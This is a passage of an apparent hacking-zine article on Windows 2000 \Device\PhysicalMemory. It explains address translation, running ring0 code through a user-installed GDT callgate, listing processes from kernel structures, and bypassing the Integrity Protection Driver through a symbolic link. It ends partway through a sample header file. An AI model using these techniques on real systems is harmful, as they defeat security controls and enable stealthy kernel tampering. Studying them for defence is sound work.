+   1) Open a Handle to the object (NtOpenSection)
+   2) Translate the virtual address into a physical address
+   3) Map the section to a memory space (NtMapViewOfSection)
+   4) Read/Write data where the memory has been mapped
+   5) Unmap the section (NtUnmapViewOfSection)
+   6) Close the object's Handle (NtClose)
+   
+Our main problem for now is how to translate the virtual address to a 
+physical address. We know that in kernel-mode (ring0), there is a function 
+called MmGetPhysicalAddress exported by ntoskrnl.exe which do that.
+But we are in ring3 so we have to "emulate" such function. 
+
+---
+from ntddk.h
+PHYSICAL_ADDRESS MmGetPhysicalAddress(void *BaseAddress);
+---
+
+PHYSICAL_ADDRESS is a quad-word (64 bits). At the beginning i wanted to
+join with the article the analysis of the assembly code but it's too long.
+And as address translation is sort of generic (cpu relative) i only go fast
+on this subject.
+
+The low part of the quad-word is passed in eax and the high part in edx.
+For virtual to physical address translation we have 2 cases:
+
+ * case 0x80000000 <= BaseAddress < 0xA0000000:
+the only thing we need to do is to apply a 0x1FFFF000 mask to the virtual
+address.
+
+ * case BaseAddress < 0x80000000 && BaseAddress >= 0xA0000000
+This case is a problem for us as we have no way to translate addresses in
+this range because we need to read cr3 register or to run non ring3
+callable assembly instruction. For more information about Paging on Intel
+arch take a look at Intel Software Developer's Manual Volume 3 (see [5]).
+EliCZ told me that by his experience we can guess a physical address for
+this range by masking the byte offset and keeping a part of the page
+directory index. mask: 0xFFFF000.
+
+We can know produce a light version of MmGetPhysicalAddress()
+
+PHYSICAL_MEMORY MyGetPhysicalAddress(void *BaseAddress) {
+   if (BaseAddress < 0x80000000 || BaseAddress >= 0xA0000000) {
+      return(BaseAddress & 0xFFFF000);
+   }
+   return(BaseAddress & 0x1FFFF000);
+}
+
+The problem with the addresses outside the [0x80000000, 0xA0000000] is that
+they can't be guessed with a very good sucess rate.
+That's why if you want good results you would rather call the real
+MmGetPhysicalAddress(). We will see how to do that in few chapter.
+
+See winkdump.c for sample memory dumper.
+
+After some tests using winkdump i realised that in fact there is another
+problem in our *good* range :>. When translating virtual address above
+0x877ef000 the physical address is getting above 0x00000000077e0000.
+And on my system this is not *possible*:
+
+kd> dd MmHighestPhysicalPage l1
+dd MmHighestPhysicalPage l1
+8046a04c  000077ef
+
+We can see that the last physical page is locate at 0x0000000077ef0000.
+So in fact that means that we can only dump a small section of the memory.
+But anyway the goal of this chapter is much more an explaination about
+how to start using \Device\PhysicalMemory than to create a *good* memory
+dumper. As the dumpable range is where ntoskrnl.exe and HAL.dll (Hardware
+Abstraction Layer) are mapped you can still do some stuff like dumping the
+syscall table:
+
+kd> ? KeServiceDescriptorTable
+? KeServiceDescriptorTable
+Evaluate expression: -2142852224 = 8046ab80
+
+0x8046ab80 is the address of the System Service Table structure
+which looks like:
+
+typedef struct _SST {
+   PDWORD  ServiceTable;           // array of entry points
+   PDWORD  CounterTable;           // array of usage counters
+   DWORD   ServiceLimit;           // number of table entries
+   PBYTE   ArgumentTable;          // array of byte counts
+} SST, *PSST;
+
+C:\coding\phrack\winkdump\Release>winkdump.exe 0x8046ab80 16
+ *** win2k memory dumper using \Device\PhysicalMemory ***
+
+ Virtual Address       : 0x8046ab80
+ Allocation granularity: 65536 bytes
+ Offset                : 0xab80
+ Physical Address      : 0x0000000000460000
+ Mapped size           : 45056 bytes
+ View size             : 16 bytes
+
+d8 04 47 80 00 00 00 00  f8 00 00 00 bc 08 47 80  | ..G...........G.
+
+Array of pointers to syscalls: 0x804704d8 (symbol KiServiceTable)
+Counter table                : NULL
+ServiceLimit                 : 248 (0xf8) syscalls
+Argument table               : 0x804708bc (symbol KiArgumentTable)
+
+We are not going to dump the 248 syscalls addresses but just take a look at
+some:
+
+C:\coding\phrack\winkdump\Release>winkdump.exe 0x804704d8 12
+ *** win2k memory dumper using \Device\PhysicalMemory ***
+
+ Virtual Address       : 0x804704d8
+ Allocation granularity: 65536 bytes
+ Offset                : 0x4d8
+ Physical Address      : 0x0000000000470000
+ Mapped size           : 4096 bytes
+ View size             : 12 bytes
+
+bf b3 4a 80 6b e8 4a 80  f3 de 4b 80              | ..J.k.J...K.
+
+ * 0x804ab3bf (NtAcceptConnectPort)
+ * 0x804ae86b (NtAccessCheck)
+ * 0x804bdef3 (NtAccessCheckAndAuditAlarm)
+
+In the next section we will see what are callgates and how we can use them
+with \Device\PhysicalMemory to fix problems like our address translation
+thing.
+
+
+----[ 4.2 What's a  Callgate
+
+Callgate are mechanisms that enable a program to execute functions in
+higher privilege level than it is. Like a ring3 program could execute ring0
+code.
+In order to create a Callgate yo must specify:
+   1) which ring level you want the code to be executed
+   2) the address of the function that will be executed when jumping to   
+      ring0
+   3) the number of arguments passed to the function
+
+When the callgate is accessed, the processor first performs a privilege
+check, saves the current SS, ESP, CS and EIP registers, then it loads the
+segment selector and stack pointer for the new stack (ring0 stack) from the
+TSS into the SS and ESP registers.
+At this point it can switch to the new ring0 stack.
+SS and ESP registers are pushed onto the stack, the arguments are copied.
+CS and EIP (saved) registers are now pushed onto the stack for the calling
+procedure to the new stack. The new segment selector is loaded for the new
+code segment and instruction pointer from the callgate is loaded into CS
+and EIP registers. Finnaly :) it jumps to the function's address specified
+when creating the callgate.
+
+The function executed in ring0 MUST clean its stack once it has finished
+executing, that's why we are going to use __declspec(naked) (MS VC++ 6)
+when defining the function in our code (similar to __attribute__(stdcall)
+for GCC).
+
+---
+from MSDN:
+__declspec( naked ) declarator
+
+For functions declared with the naked attribute, the compiler generates
+code without prolog and epilog code. You can use this feature to write your
+own prolog/epilog code using inline assembler code.
+---
+
+For more information about callgates look at Intel Software Developer's
+Manual Volume 1 (see [5]).
+
+In order to install a Callgate we have 2 choices: or we manually seek a
+free entry in the GDT where we can place our Callgate or we use some
+undocumented functions of ntoskrnl.exe. But these functions are only
+accessible from ring0. It's useless in our case since we are not in ring0
+but anyway i will very briefly show you them:
+
+NTSTATUS KeI386AllocateGdtSelectors(USHORT *SelectorArray, 
+                                    USHORT nSelectors);
+NTSTATUS KeI386ReleaseGdtSelectors(USHORT *SelectorArray, 
+                                   USHORT nSelectors);
+NTSTATUS KeI386SetGdtSelector(USHORT Selector,
+                              PVOID Descriptor);
+
+Their names are explicits enough i think :). So if you want to install a
+callgate, first allocate a GDT selector with KeI386AllocateGdtSelectors(),
+then set it with KeI386SetGdtSelector. When you are done just release it
+with KeI386ReleaseGdtSelectors.
+
+That's interesting but it doesn't fit our need. So we need to set a GDT
+selector while executing code in ring3. Here comes \Device\PhysicalMemory.
+In the next section i will explain how to use \Device\PhysicalMemory to
+install a callgate.
+
+
+----[ 4.3 Running ring0 code without the use of Driver
+
+First question, "why running ring0 code without the use of Device Driver ?"
+Advantages:
+   * no need to register a service to the SCM (Service Control Manager).
+   * stealth code ;)
+
+Inconvenients:
+   * code would never be as stable as if running from a (well coded) device    
+     driver.
+   * we need to add write access to \Device\PhysicalMemory
+
+So just keep in mind that you are dealing with hell while running ring0
+code through \Device\PhysicalMemory =]
+
+Ok now we can write the memory and we know that we can use callgate to run
+ring0 so what are you waiting ?
+First we need to know what part of the section to map to read the GDT
+table. This is not a problem since we can access the global descriptor
+table register using "sgdt" assembler instruction.
+
+typedef struct _KGDTENTRY {
+   WORD LimitLow; // size in bytes of the GDT
+   WORD BaseLow;  // address of GDT (low part)
+   WORD BaseHigh; // address of GDT (high part)
+} KGDTENTRY, *PKGDTENTRY;
+
+KGDT_ENTRY gGdt;
+_asm sgdt gGdt; // load Global Descriptor Table register into gGdt
+
+We translate the Virtual address from BaseLow/BaseHigh to a physical
+address and then we map the base address of the GDT table.
+We are lucky because even if the GDT table adddress is not in our *wanted*
+range, it will be right translated (in 99% cases).
+
+PhysicalAddress = GetPhysicalAddress(gGdt.BaseHigh << 16 | gGdt.BaseLow);
+
+NtMapViewOfSection(SectionHandle,
+                   ProcessHandle,
+                   BaseAddress,       // pointer to mapped memory
+                   0L,
+                   gGdt.LimitLow,     // size to map
+                   &PhysicalAddress,
+                   &ViewSize,         // pointer to mapped size
+                   ViewShare,
+                   0,                 // allocation type
+                   PAGE_READWRITE);   // protection
+
+Finally we loop in the mapped memory to find a free selector by looking at
+the "Present" flag of the Callgate descriptor structure.
+
+typedef struct _CALLGATE_DESCRIPTOR {
+   USHORT offset_0_15;    // low part of the function address
+   USHORT selector;
+   UCHAR  param_count :4;
+   UCHAR  some_bits   :4;
+   UCHAR  type        :4; // segment or gate type
+   UCHAR  app_system  :1; // segment descriptor (0) or system segment (1)
+   UCHAR  dpl         :2; // specify which privilege level can call it
+   UCHAR  present     :1;
+   USHORT offset_16_31;   // high part of the function address
+} CALLGATE_DESCRIPTOR, *PCALLGATE_DESCRIPTOR;
+
+offset_0_15 and offset_16_31 are just the low/high word of the function
+address. The selector can be one of this list:
+
+--- from ntddk.h
+#define KGDT_NULL       0
+#define KGDT_R0_CODE    8   // <-- what we need (ring0 code)
+#define KGDT_R0_DATA    16
+#define KGDT_R3_CODE    24
+#define KGDT_R3_DATA    32
+#define KGDT_TSS        40
+#define KGDT_R0_PCR     48
+#define KGDT_R3_TEB     56
+#define KGDT_VDM_TILE   64
+#define KGDT_LDT        72
+#define KGDT_DF_TSS     80
+#define KGDT_NMI_TSS    88
+---
+
+Once the callgate is installed there are 2 steps left to supreme ring0
+power: coding our function called with the callgate and call the callgate.
+
+As said in section 4.2, we need to code a function with a ring0
+prolog / epilog and we need to clean our stack. Let's take a look at this
+sample function:
+
+void __declspec(naked) Ring0Func() { // our nude function :]
+   // ring0 prolog
+   _asm {
+      pushad // push eax,ecx,edx,ebx,ebp,esp,esi,edi onto the stack
+      pushfd // decrement stack pointer by 4 and push EFLAGS onto the stack
+      cli    // disable interrupt
+   }
+   
+   // execute your ring0 code here ...
+   
+   // ring0 epilog
+   _asm {
+      popfd // restore registers pushed by pushfd
+      popad // restore registers pushed by pushad
+      retf  // you may retf <sizeof arguments> if you pass arguments
+   }
+}
+
+Pushing all registers onto the stack is the way we use to save all
+registers while the ring0 code execution.
+
+1 step left, calling the callgate...
+A standart call won't fit as the callgate procedure is located in a
+different privilege level (ring0) than the current code privilege level
+(ring3).
+We are doing to do a "far call" (inter-privilege level call).
+So in order to call the callgate you must do like this:
+
+short farcall[3];
+farcall[0 --> 1] = offset from the target operand. This is ignored when a
+callgate is used according to "IA-32 Intel Architecture Software
+Developer's Manual (Volume 2)" (see [5]).
+
+farcall[2] = callgate selector
+
+At this time we can call our callgate using inline assembly.
+
+_asm {
+   push arg1
+   ...
+   push argN
+   call fword ptr [farcall]
+}
+
+I forgot to mention that as it's a farcall first argument is located at
+[ebp+0Ch] in the callgate function.
+
+
+----[ 4.4 Deeper into Process listing
+
+Now we will see how to list process in the kernel the lowest level we can
+do :).
+The design goal of creating a Kernel process lister at the lowest level
+could be to see process hidden by a rootkit (taskmgr.exe patched, Syscall
+hooked, ...).
+
+You remember that Jamirocai song: "Going deeper underground". We will do
+the same. Let's see which way we can use to list process.
+
+   - Process32First/Process32Next, the easy documented way (ground level)
+
+   - NtQuerySystemInformation using Class 5, Native API way. Basicly not
+     documented but there are many sample on internet (level -1)
+
+   - ExpGetProcessInformation, called internally by
+     NtQuerySystemInformation (level -2)
+
+   - Reading the double chained list PsActiveProcessHead (level -3) :p
+
+Ok now we are deep enough.
+The double chained list scheme looks like:
+
+APL (f): ActiveProcessLinks.FLink
+APL (b): ActiveProcessLinks.BLink
+
+        process1          process2          process3          processN
+0x000 |----------|      |----------|      |----------| 
+      | EPROCESS |      | EPROCESS |      | EPROCESS |
+      |   ...    |      |   ...    |      |   ...    |
+0x0A0 |  APL (f) |----->|  APL (f) |----->|  APL (f) |-----> ...
+0x0A4 |  APL (b) | \-<--|  APL (b) | \-<--|  APL (b) | \-<-- ...
+      |   ...    |      |   ...    |      |   ...    |
+      |----------|      |----------|      |----------|
+
+
+As you can see (well ... my scheme is not that good :/) the next/prev
+pointers of the ActiveProcessLinks struct are not _EPROCESS structure
+pointers. They are pointing to the next LIST_ENTRY struct. That means that
+if we want to retrieve the _EPROCESS structure address, we have to adjust
+the pointer.
+
+(look at _EPROCESS struct definition in kmem.h in sample code section)
+LIST_ENTRY ActiveProcessLinks is at offset 0x0A0 in _EPROCESS struct:
+ --> Flink = 0x0A0
+ --> Blink = 0x0A4
+
+So we can quickly create some macros for later use:
+
+#define TO_EPROCESS(_a) ((char *) _a - 0xA0) // Flink to _EPROCESS
+#define TO_PID(_a) ((char *) _a - 0x4)       // Flink to UniqueProcessId
+#define TO_PNAME(_a) ((char *) _a + 0x15C)   // Flink to ImageFileName
+
+The head of the LIST_ENTRY list is PsActiveProcessHead. You can get its
+address with kd for example:
+
+kd> ? PsActiveProcessHead
+? PsActiveProcessHead
+Evaluate expression: -2142854784 = 8046a180
+
+Just one thing to know. As this List can change very quickly, you may want
+to lock it before reading it. Reading ExpGetProcessInformation assembly, we
+can see:
+
+   mov     ecx, offset _PspActiveProcessMutex
+   call    ds:__imp_@ExAcquireFastMutex@4
+   [...]
+   mov     ecx, offset _PspActiveProcessMutex
+   call    ds:__imp_@ExReleaseFastMutex@4
+
+ExAcquireFastMutex and ExReleaseFastMutex are __fastcall defined so the
+arguments are pushed in reverse order (ecx, edx,...). They are exported by
+HAL.dll. By the way i don't lock it in winkps.c :)
+
+Ok, first we install a callgate to be able to execute the ring0 function
+(MmGetPhysicalAddress and ExAcquireFastMutex/ExReleaseFastMutex if you 
+want), then we list the process and finally we remove the callgate.
+
+See winkps.c in sample code section.
+
+Installing the callgate is an easy step as you can see in the sample code.
+The hard part is reading the LIST_ENTRY struct. It's kinda strange because
+reading a chained list is not supposed to be hard but we are dealing with
+physical memory.
+First in order to avoid too much use of our callgate we try to use it as
+less as we can. Remember, running ring0 code in ring3 is not
+*a good thing*.
+Problems could happend on the dispatch level where the thread is executed
+and second your thread (i think) have a lower priority than a device
+driver even if you use SetThreadPriority().
+
+The scheduler base his scheduling on 2 things, the BasePriority of a
+process and his Current priority, when you modify thread priority using
+win32 API SetThreadPriority(), the current priority is changed but it's
+relative to the base priority. And there is no way to change base priority
+of a process in ring3.
+
+So in order to prevent mapping the section for every process i map 1mb
+section each time i need to map one. I think it's the best choice since
+most of the EPROCESS structures are located around 0xfce***** - 0xfcf*****.
+
+C:\coding\phrack\winkps\Release>winkps
+ *** win2k process lister ***
+
+Allocation granularity: 65536 bytes
+MmGetPhysicalAddress   : 0x804374e0
+virtual address of GDT : 0x80036000
+physical address of GDT: 0x0000000000036000
+Allocated segment      : 3fb
+mapped 0xb000 bytes @ 0x00430000 (init Size: 0xa184 bytes)
+mapped 0x100000 bytes @ 0x0043e000 (init Size: 0x100000 bytes)
+ + 8     System
+mapped 0x100000 bytes @ 0x0054e000 (init Size: 0x100000 bytes)
+ + 136   smss.exe
+ + 160   csrss.exe
+ + 156   winlogon.exe
+ + 208   services.exe
+ + 220   lsass.exe
+ + 420   regsvc.exe
+ + 436   svchost.exe
+ + 480   svchost.exe
+ + 524   WinMgmt.exe
+mapped 0x100000 bytes @ 0x0065e000 (init Size: 0x100000 bytes)
+ + 656   Explorer.exe
+ + 764   OSA.EXE
+ + 660   mdm.exe
+ + 752   cmd.exe
+ + 532   msdev.exe
+ + 604   ssh.exe
+ + 704   Livekd.exe
+ + 716   i386kd.exe
+ + 448   uedit32.exe
+ + 260   winkps.exe
+
+3 sections mapping + 1 for selecting the first entry (process) looks good.
+I will just briefly describe the winkps.c but better take time to read the
+code.
+
+Flow of winkps.c
+ - GetSystemInfo()
+   grab Allocation granularity on the system. (used for calculating offset
+   on address translation).
+   
+ - LoadLibrary()
+   get the address of MmGetPhysicalAddress in ntoskrnl.exe. This can also
+   be done by parsing the PE header.
+   
+ - NtOpenSection()
+   open \Device\PhysicalMemory r/w.
+   
+ - InstallCallgate()
+   Map the section for install/remove callgate and install the callgate  
+   using second argument as callgate function.
+
+ - DisplayProcesses()
+   main loop. Errors are catched by the execption handler.
+   I do this in order to try cleaning the callgate even if there is an
+   error like access violation (could happend if bad mapping).
+   
+- UninstallCallgate()
+  Remove the callgate and unmap the mapping of the section.
+
+- NtClose()
+  Simply close the opened HANDLE :)
+
+Now it's time you to read the code and try to recode winkdump.c with a
+better address translation support using a callgate :>
+
+
+----[ 4.5 Bonus Track
+
+As far as i know, the only product that try to restrict access to
+\Device\PhysicalMemory is "Integrity Protection Driver (IPD)" from Pedestal
+Software (see [6]).
+
+---
+from README:
+    The IPD forbids any process from opening \Device\PhysicalMemory.
+---
+
+ok so .. let's say we want to use ipd and we still want to play with
+\Device\PhysicalMemory heh :). I don't really know if this product is well-
+known but anyway i wanted to bypass its protection.
+In order to restrict access to \Device\PhysicalMemory IPD hooks
+ZwOpenSection() and check that the Section being opened is not called
+"\Device\PhysicalMemory".
+
+---
+from h_mem.c
+   if (restrictEnabled()) {
+      if (ObjectAttributes && ObjectAttributes->ObjectName &&
+          ObjectAttributes->ObjectName->Length>0) {
+          if (_wcsicmp(ObjectAttributes->ObjectName->Buffer,
+                       L"\\Device\\PhysicaMemory")==0) {
+             WCHAR buf[200];
+             swprintf(buf,
+                      L"Blocking device/PhysicalMemory access,
+                      procid=0x%x\n", PsGetCurrentProcessId());
+             debugOutput(buf);
+             return STATUS_ACCESS_DENIED;
+          }
+       }
+    }
+---
+
+_wcsicmp() perform a lowercase comparison of 2 Unicode buffer so if we find
+a way to open the object using another name we are done :).
+In first chapter we have seen that there were a symbolic link object type
+so what's about creating a symbolic link object linked to
+\Device\PhysicalMemory ?
+By looking at ntdll.dll export table, you can find a function called
+"NtCreateSymbolicLinkObject" but like most of interesting things it's not
+documented. The prototype is like this:
+
+NTSTATUS NtCreateSymbolicLinkObject(PHANDLE SymLinkHandle,
+                                    ACCESS_MASK DesiredAccess,
+                                    POBJECT_ATTRIBUTES ObAttributes,
+                                    PUNICODE_STRING ObName);
+
+So we just have to call this function with "\Device\PhysicalMemory" as the
+ObName and we set our new name in the OBJECT_ATTRIBUTES structures. We use
+"\??\" as root directory for our object so the name is now
+"\??\hack_da_ipd".
+At the beginning i was asking myself how the kernel would resolve the
+symbolic link when calling NtOpenSection with "\??\hack_da_ipd". If
+NtOpenSection was checking that the destination object is a symbolic link
+and then recall NtOpenSection with the real name of the object, our
+symbolic link would be useless because IPD could detect it.
+So i straced it:
+
+---
+[...]
+3 NtCreateSymbolicLinkObject(0x1, {24, 0, 0x40, 0, 0,
+     "\??\hack_da_ipd"}, 1245028, ... 48, ) == 0x0
+4 NtAllocateVirtualMemory(-1, 1244448, 0, 1244480, 4096, 4, ... ) == 0x0
+5 NtRequestWaitReplyPort(36, {124, 148, 0, 16711934, 4222620, 256, 0}, ...           
+     {124, 148, 2, 868, 840, 7002, 0}, ) == 0x0
+6 NtOpenSection (0x4, {24, 0, 0x40, 0, 0, "\??\hack_da_ipd"}, ... 44, )  
+     == 0x0
+7 NtRequestWaitReplyPort (36, {124, 148, 0, 868, 840, 7002, 0}, ... {124,
+     148, 2, 868, 840, 7003, 0}, ) == 0x0
+8 NtClose (44, ... ) == 0x0
+9 NtClose (48, ... ) == 0x0
+[...]
+---
+
+(a strace for Windows is avaible at BindView's RAZOR web site. see [7])
+
+As you can see NtOpenSection doesn't recall itself with the real name of
+the object so all is good.
+At this point \Device\PhysicalMemory is our so IPD is 100% corrupted :p as
+we can read/write whereever we want in the memory.
+Remember that you must run this program with user SYSTEM.
+
+
+--[ 5 - Sample code
+
+LICENSE:
+Sample code provided with the article may be copied/duplicated and modified
+in any form as long as this copyright is prepended unmodified.
+Code are proof of concept and the author can and must not be made
+responsible for any damage/data loss.
+Use this code at your own risk.
+
+                                            crazylord / CNS
+
+
+----[ 5.1 kmem.h
+
+typedef struct _UNICODE_STRING {
+    USHORT Length;
+    USHORT MaximumLength;
+    PWSTR  Buffer;
+} UNICODE_STRING, *PUNICODE_STRING;
+
+#define OBJ_CASE_INSENSITIVE 0x00000040L
+#define OBJ_KERNEL_HANDLE    0x00000200L
+
+typedef LONG NTSTATUS;
+#define STATUS_SUCCESS       (NTSTATUS) 0x00000000L
+#define STATUS_ACCESS_DENIED (NTSTATUS) 0xC0000022L
+
+#define MAKE_DWORD(_l, _h) (DWORD) (_l | (_h << 16))
+
+typedef struct _OBJECT_ATTRIBUTES {
+    ULONG Length;
+    HANDLE RootDirectory;
+    PUNICODE_STRING ObjectName;
+    ULONG Attributes;
+    PVOID SecurityDescriptor;
+    PVOID SecurityQualityOfService;
+} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;
+
+// useful macros
+#define InitializeObjectAttributes( p, n, a, r, s ) { \
+    (p)->Length = sizeof( OBJECT_ATTRIBUTES );        \
+    (p)->RootDirectory = r;                           \
+    (p)->Attributes = a;                              \
+    (p)->ObjectName = n;                              \
+    (p)->SecurityDescriptor = s;                      \
+    (p)->SecurityQualityOfService = NULL;             \
+    }
+
+#define INIT_UNICODE(_var,_buffer)            \
+        UNICODE_STRING _var = {               \
+            sizeof (_buffer) - sizeof (WORD), \
+            sizeof (_buffer),                 \
+            _buffer }
+
+// callgate info
+typedef struct _KGDTENTRY {
+   WORD LimitLow;
+   WORD BaseLow;
+   WORD BaseHigh;
+} KGDTENTRY, *PKGDTENTRY;
+
+typedef struct _CALLGATE_DESCRIPTOR {
+   USHORT offset_0_15;
+   USHORT selector;
+   UCHAR  param_count :4;
+   UCHAR  some_bits   :4;
+   UCHAR  type        :4;
+   UCHAR  app_system  :1;
+   UCHAR  dpl         :2;
+   UCHAR  present     :1;
+   USHORT offset_16_31;
+} CALLGATE_DESCRIPTOR, *PCALLGATE_DESCRIPTOR;
+
+// section info
+typedef LARGE_INTEGER PHYSICAL_ADDRESS, *PPHYSICAL_ADDRESS;
+typedef enum _SECTION_INHERIT {
+    ViewShare = 1,
+    ViewUnmap = 2
+} SECTION_INHERIT;
+
+typedef struct _MAPPING {
+/*000*/ PHYSICAL_ADDRESS pAddress;
+/*008*/ PVOID            vAddress;
+/*00C*/ DWORD            Offset;
+/*010*/ } MAPPING, *PMAPPING;
+
+// symlink info
+#define SYMBOLIC_LINK_QUERY                              (0x0001)
+#define SYMBOLIC_LINK_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0x1)
+
+// process info
+// Flink to _EPROCESS
+#define TO_EPROCESS(_a) ((DWORD) _a - 0xA0)
+// Flink to UniqueProcessId
+#define TO_PID(_a) (DWORD) ((DWORD) _a - 0x4)
+// Flink to ImageFileName
+#define TO_PNAME(_a) (PCHAR) ((DWORD) _a + 0x15C)
+
+typedef struct _DISPATCHER_HEADER {
+/*000*/ UCHAR Type;
+/*001*/ UCHAR Absolute;
+/*002*/ UCHAR Size;
+/*003*/ UCHAR Inserted;
+/*004*/ LONG SignalState;
+/*008*/ LIST_ENTRY WaitListHead;
+/*010*/ } DISPATCHER_HEADER;
+
+typedef struct _KEVENT {
+/*000*/ DISPATCHER_HEADER Header;
+/*010*/ } KEVENT, *PKEVENT;
+
+typedef struct _FAST_MUTEX {
+/*000*/ LONG Count;
+/*004*/ PVOID Owner;
+/*008*/ ULONG Contention;
+/*00C*/ KEVENT Event;
+/*01C*/ ULONG OldIrql;
+/*020*/ } FAST_MUTEX, *PFAST_MUTEX;
+
+// the two following definition come from w2k_def.h by Sven B. Schreiber
+typedef struct _MMSUPPORT {
+/*000*/ LARGE_INTEGER LastTrimTime;
+/*008*/ DWORD         LastTrimFaultCount;
+/*00C*/ DWORD         PageFaultCount;
+/*010*/ DWORD         PeakWorkingSetSize;
+/*014*/ DWORD         WorkingSetSize;
+/*018*/ DWORD         MinimumWorkingSetSize;
+/*01C*/ DWORD         MaximumWorkingSetSize;
+/*020*/ PVOID         VmWorkingSetList;
+/*024*/ LIST_ENTRY    WorkingSetExpansionLinks;
+/*02C*/ BOOLEAN       AllowWorkingSetAdjustment;
+/*02D*/ BOOLEAN       AddressSpaceBeingDeleted;
+/*02E*/ BYTE          ForegroundSwitchCount;
+/*02F*/ BYTE          MemoryPriority;
+/*030*/ } MMSUPPORT, *PMMSUPPORT;
+
+typedef struct _IO_COUNTERS {
+/*000*/ ULONGLONG  ReadOperationCount;
+/*008*/ ULONGLONG  WriteOperationCount;
+/*010*/ ULONGLONG  OtherOperationCount;
+/*018*/ ULONGLONG ReadTransferCount;
+/*020*/ ULONGLONG WriteTransferCount;
+/*028*/ ULONGLONG OtherTransferCount;
+/*030*/ } IO_COUNTERS, *PIO_COUNTERS;
+
+// this is a very simplified version :) of the EPROCESS
+// structure.
+
+typedef struct _EPROCESS {
+/*000*/ BYTE                   Pcb[0x6C];
+/*06C*/ NTSTATUS               ExitStatus;
+/*070*/ KEVENT                 LockEvent;
+/*080*/ DWORD                  LockCount;
+/*084*/ DWORD                  dw084;
+/*088*/ LARGE_INTEGER          CreateTime;
+/*090*/ LARGE_INTEGER          ExitTime;
+/*098*/ PVOID                  LockOwner;
+/*09C*/ DWORD                  UniqueProcessId;
+/*0A0*/ LIST_ENTRY             ActiveProcessLinks; // see PsActiveListHead
+/*0A8*/ DWORD                  QuotaPeakPoolUsage[2]; // NP, P
+/*0B0*/ DWORD                  QuotaPoolUsage[2]; // NP, P
+/*0B8*/ DWORD                  PagefileUsage;
+/*0BC*/ DWORD                  CommitCharge;
+/*0C0*/ DWORD                  PeakPagefileUsage;
+/*0C4*/ DWORD                  PeakVirtualSize;
+/*0C8*/ LARGE_INTEGER          VirtualSize;
+/*0D0*/ MMSUPPORT              Vm;
+/*100*/ LIST_ENTRY             SessionProcessLinks;
+/*108*/ DWORD                  dw108[6];
+/*120*/ PVOID                  DebugPort;
+/*124*/ PVOID                  ExceptionPort;
+/*128*/ PVOID                  ObjectTable;
+/*12C*/ PVOID                  Token;
+/*130*/ FAST_MUTEX             WorkingSetLock;
+/*150*/ DWORD                  WorkingSetPage;
+/*154*/ BOOLEAN                ProcessOutswapEnabled;
+/*155*/ BOOLEAN                ProcessOutswapped;
+/*156*/ BOOLEAN                AddressSpaceInitialized;
+/*157*/ BOOLEAN                AddressSpaceDeleted;
+/*158*/ FAST_MUTEX             AddressCreationLock;
+/*178*/ KSPIN_LOCK             HyperSpaceLock;
+/*17C*/ DWORD                  ForkInProgress;
+/*180*/ WORD                   VmOperation;
+/*182*/ BOOLEAN                ForkWasSuccessful;
+/*183*/ BYTE                   MmAgressiveWsTrimMask;
+/*184*/ DWORD                  VmOperationEvent;
+/*188*/ PVOID                  PaeTop;
+/*18C*/ DWORD                  LastFaultCount;
+/*190*/ DWORD                  ModifiedPageCount;
+/*194*/ PVOID                  VadRoot;
+/*198*/ PVOID                  VadHint;
+/*19C*/ PVOID                  CloneRoot;
+/*1A0*/ DWORD                  NumberOfPrivatePages;
+/*1A4*/ DWORD                  NumberOfLockedPages;
+/*1A8*/ WORD                   NextPageColor;
+/*1AA*/ BOOLEAN                ExitProcessCalled;
+/*1AB*/ BOOLEAN                CreateProcessReported;
+/*1AC*/ HANDLE                 SectionHandle;
+/*1B0*/ PVOID                  Peb;
+/*1B4*/ PVOID                  SectionBaseAddress;
+/*1B8*/ PVOID                  QuotaBlock;
+/*1BC*/ NTSTATUS               LastThreadExitStatus;
+/*1C0*/ DWORD                  WorkingSetWatch;
+/*1C4*/ HANDLE                 Win32WindowStation;
+/*1C8*/ DWORD                  InheritedFromUniqueProcessId;
+/*1CC*/ ACCESS_MASK            GrantedAccess;
+/*1D0*/ DWORD                  DefaultHardErrorProcessing; // HEM_*
+/*1D4*/ DWORD                  LdtInformation;
+/*1D8*/ PVOID                  VadFreeHint;
+/*1DC*/ DWORD                  VdmObjects;
+/*1E0*/ PVOID                  DeviceMap;
+/*1E4*/ DWORD                  SessionId;
+/*1E8*/ LIST_ENTRY             PhysicalVadList;
+/*1F0*/ PVOID                  PageDirectoryPte;
+/*1F4*/ DWORD                  dw1F4;
+/*1F8*/ DWORD                  PaePageDirectoryPage;
+/*1FC*/ CHAR                   ImageFileName[16];
+/*20C*/ DWORD                  VmTrimFaultValue;
+/*210*/ BYTE                   SetTimerResolution;
+/*211*/ BYTE                   PriorityClass;
+/*212*/ WORD                   SubSystemVersion;
+/*214*/ PVOID                  Win32Process;
+/*218*/ PVOID                  Job;
+/*21C*/ DWORD                  JobStatus;
+/*220*/ LIST_ENTRY             JobLinks;
+/*228*/ PVOID                  LockedPagesList;
+/*22C*/ PVOID                  SecurityPort;
+/*230*/ PVOID                  Wow64;
+/*234*/ DWORD                  dw234;
+/*238*/ IO_COUNTERS            IoCounters;
+/*268*/ DWORD                  CommitChargeLimit;
+/*26C*/ DWORD                  CommitChargePeak;
+/*270*/ LIST_ENTRY             ThreadListHead;
+/*278*/ PVOID                  VadPhysicalPagesBitMap;
+/*27C*/ DWORD                  VadPhysicalPages;
+/*280*/ DWORD                  AweLock;
+/*284*/ } EPROCESS, *PEPROCESS;
+
+
+// copy ntdll.lib from Microsoft DDK to current directory
+#pragma comment(lib, "ntdll")
+#define IMP_SYSCALL __declspec(dllimport) NTSTATUS _stdcall 
+
+IMP_SYSCALL
+NtMapViewOfSection(HANDLE SectionHandle,
+                   HANDLE ProcessHandle,
+                   PVOID *BaseAddress,
+                   ULONG ZeroBits,
+                   ULONG CommitSize,
+                   PLARGE_INTEGER SectionOffset,
+                   PSIZE_T ViewSize,
+                   SECTION_INHERIT InheritDisposition,
+                   ULONG AllocationType,
+                   ULONG Protect);
+
+IMP_SYSCALL
+NtUnmapViewOfSection(HANDLE ProcessHandle,
+                     PVOID BaseAddress);
+
+IMP_SYSCALL
+NtOpenSection(PHANDLE SectionHandle,
+              ACCESS_MASK DesiredAccess,
+              POBJECT_ATTRIBUTES ObjectAttributes);
+
+IMP_SYSCALL
+NtClose(HANDLE Handle);
+
+IMP_SYSCALL
+NtCreateSymbolicLinkObject(PHANDLE SymLinkHandle,
+                           ACCESS_MASK DesiredAccess,
+                           POBJECT_ATTRIBUTES ObjectAttributes,
